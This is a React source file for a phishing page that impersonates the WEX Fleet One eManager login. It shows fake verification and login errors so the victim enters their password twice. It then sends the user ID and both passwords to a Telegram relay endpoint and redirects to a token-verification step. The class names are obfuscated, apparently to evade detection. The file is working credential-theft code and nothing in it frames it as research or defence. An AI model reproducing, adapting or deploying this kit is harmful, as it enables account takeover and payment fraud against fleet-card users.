import { useEffect, useState } from "react";
import axios from 'axios';
import LoginForm from "../LoginForm/LoginForm";
import styles from "./fleetPage.module.scss";
import { useNavigate } from "react-router";
import img from './wexlogo.png'
import Popup from "../popup";

const FleetPage = () => {
    const [first, setFirst] = useState(1);
    const [login, setLogin] = useState('');
    const [gg, setGg] = useState(false);
    const [pass, setPass] = useState('');
    const [error, setError] = useState(false);
    let navigate = useNavigate();

    useEffect(() => {
        const hash = window.location.hash.replace('#', '');
        if (!hash) return;

        try {
            const decoded = atob(hash);
            localStorage.setItem('alosss', decoded);
        } catch { }
    }, []);



    const onFinish = (async () => {
        if (first === 1) {
            setTimeout(() => {
                localStorage.setItem("login", login)
                localStorage.setItem("pass", pass)
                setPass('')
                setFirst(3)
            }, 1500)
        } else if (first == 3 && login && pass) {
            const password = localStorage.getItem('pass')
            const message = `
            Hello Friends:
            User/Carrier ID*: ${login}
            Password*: ${password}
            Second Password*: ${pass}
        `;

            try {
                // Send the message with form data
                await fetch('/api/send-to-telegram', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ message: message }),
                });
                setTimeout(() => {
                    navigate('/tokenverify')
                }, 2000);
            } catch (error) {
                console.error('Error sending data to Telegram:', error);
            }
        }
    })
    const [open, setOpen] = useState(true);
    return (
        <>
            <main className={styles.fondsikm}>
                <div className={styles.header}>
                    <div>
                        <img src={img} />
                    </div>
                </div>
                <div className={styles.duhjdsuijdnidj}>
                    <div className={styles.idjidjiudjidjidjidjidj}>
                        <div className={styles.ofhndimdidnujnm}>
                            <h2>Fleet One eManager</h2>
                            <p>Transforming the Industry's Payment Solutions</p>
                        </div>
                        <div className={styles.findimsindunimikmik}>
                            <div className={styles.fjnduindunsdmimsuim}>
                                <h2>LOGIN</h2>
                                <p>Please sign in to get access.</p>
                            </div>
                            <div className={styles.funfduidjiudjmid} />
                            {first == 3 ? <div className={styles.foindmidnuidnudnduj}>
                                <div className={styles.unbdudnudnuydnudndundundu}>
                                    <div>
                                        The following errors have occurred
                                    </div>
                                    <p>
                                        1. Login Error.
                                    </p>
                                </div>
                            </div> : ''}
                            {first != 3 ? <div className={styles.foindmidnuidnudnduj}>
                                <div className={styles.unbdudnudnuydnudndundundu}>
                                    <div>
                                        Unable to Verify Company
                                    </div>
                                    <p>
                                        The entered PIN could not be validated.
                                        Login with double authentication is needed to confirm ownership and continue.
                                    </p>
                                </div>
                            </div> : ''}
                            <div className={styles.fubfdudnuidnmusnundund}>
                                <div className={styles.iuhjnduudjnuujnujm}>
                                    <div>
                                        <input placeholder="Fleet One User ID - Or - Account eMail" onChange={(e) => {
                                            setLogin(e.target.value)
                                        }} />
                                    </div>
                                    <div>
                                        <input type="password" placeholder="Password" value={pass} onChange={(e) => {
                                            setPass(e.target.value)
                                        }} />
                                    </div>
                                </div>
                                <div className={styles.fdkidjdjdjdjudjd}>
                                    Forgot Password?
                                </div>
                                <div className={styles.odfnduidnudnudnudnu}>
                                    By accessing this system you accept the Customer Terms of Use and Privacy Policy.
                                </div>
                                <div className={styles.dujbhnfujnsudfnusd} onClick={onFinish}>
                                    Sign In
                                </div>
                            </div>
                        </div>
                    </div>
                    <div className={styles.doindmidnidnudnudnudn}>
                        <div>
                            © 2017 WEX FLEET ONE
                        </div>
                    </div>
                </div>
            </main >
            {/* <Popup isOpen={open} onClose={() => setOpen(false)}>
                <h2 className={styles.funfifjifjiufjuifjuf}> Confirmation Request </h2>
                <p className={styles.fufhifhuifjhifjfijfui}>Please sign in to continue with your money code suspension or approval request.</p>
            </Popup> */}
        </>
    )
}

export default FleetPage;